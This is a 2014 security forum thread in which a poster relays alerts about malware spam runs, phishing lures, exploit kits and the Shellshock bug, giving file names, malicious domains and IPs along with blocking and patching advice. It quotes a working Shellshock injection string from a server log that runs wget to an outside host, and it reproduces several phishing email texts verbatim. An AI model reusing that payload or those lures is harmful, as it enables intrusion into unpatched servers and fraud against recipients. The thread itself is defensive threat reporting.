22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.c...N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 23 September 2014 - 08:46 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1285 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 23 September 2014 - 05:42 AM

FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo....u-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From:     Voice Mail
Date:     23 September 2014 10:17
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...


The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustot...sis/1411464313/

** http://anubis.isecla...27a&format=html

- http://myonlinesecur...ke-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr  Current Virus total detections: 2/54*
* https://www.virustot...sis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-secur...ews.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.co...t-accounts-risk

>> https://blog.malware...RIG exploit kit

- https://isc.sans.edu...l?storyid=18699
2014-09-23

46.182.31.77: https://www.virustot...77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmic...rlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmic...Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmic...xploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist...d=CVE-2013-0074 - 9.3 (HIGH)
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 24 September 2014 - 07:37 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1286 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 24 September 2014 - 05:20 AM

FYI...

Fake BankLine SPAM
- http://blog.dynamoo....re-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From:     Bankline [secure.message@ bankline .com]
    Date:     24 September 2014 09:59
    Subject:     You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...


The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustot...sis/1411546325/

** https://anubis.isecl...3ef&format=html

- http://myonlinesecur...ke-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustot...sis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Voice mail SPAM
- http://myonlinesecur...ke-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message


24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to:   01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound)  file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecur...nvoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356

The email looks like:
    Hello,
     This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
     Regards,
    Rex Gloeckler
    Olympus Industrial...


24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustot...53/information/
213.186.33.19: https://www.virustot...19/information/
95.101.0.97: https://www.virustot...97/information/
213.186.33.17: https://www.virustot...17/information/
195.60.214.11: https://www.virustot...11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecur...depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...


Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected  or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecur...ghten-security/

- http://threattrack.t...edentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edge...KPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft...ver-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malware...e-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.co...eleases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malware...click-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.c...ached-millions/
Sep 22 2014
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 24 September 2014 - 09:34 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1287 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 25 September 2014 - 07:21 AM

FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo....nsfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

Screenshot: https://1.bp.blogspo...s1600/sage2.png

  Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustot...sis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustot...52/information/
91.196.0.119

- http://threattrack.t...re-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edge...x1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecur...ke-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustot...95/information/
95.100.255.137: https://www.virustot...37/information/
194.150.168.70: https://www.virustot...70/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/...014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
 

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, 25 September 2014 - 03:28 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1288 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 26 September 2014 - 06:51 AM

FYI...

Amazon phish ...
- http://myonlinesecur...ation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecur...onfirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails  takes you  to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo....-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

  Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustot...sis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustot...52/information/
184.106.55.51: https://www.virustot...51/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Bill.com Spam
- http://threattrack.t...8/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edge...YHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo....pplication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...


  RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo....-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustot...52/information/
195.110.124.133: https://www.virustot...33/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
 

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, 26 September 2014 - 01:14 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1289 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 28 September 2014 - 05:26 AM

FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo....-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia...ians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustot...86/information/

83.166.234.133: https://www.virustot...33/information/
___

Shellshock in the Wild
- http://www.fireeye.c...n-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.o...y/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redha...rticles/1200223
CentOS: http://centosnow.blo...r-centos-5.html
Novell SUSE: http://support.novel...-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.

- https://rhn.redhat.c...-2014-1306.html
Last updated on: 2014-09-30

If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.....jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
 

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, Today, 04:27 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1290 cnm

cnm

    Mother Lion of SWI

  • Administrators
  • PipPipPipPipPip
  • 25,257 posts

Posted 28 September 2014 - 12:46 PM

SWI is not vulnerable to Shellshock according to this test.. https://access.redha...rticles/1200223


Microsoft MVP Windows Security 2005-2006
How camest thou in this pickle? -- William Shakespeare:(1564-1616)
The various helper groups here
UNITE


#1291 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted Yesterday, 10:29 AM

FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecur...ke-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

 

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustot...06/information/
UDP communications
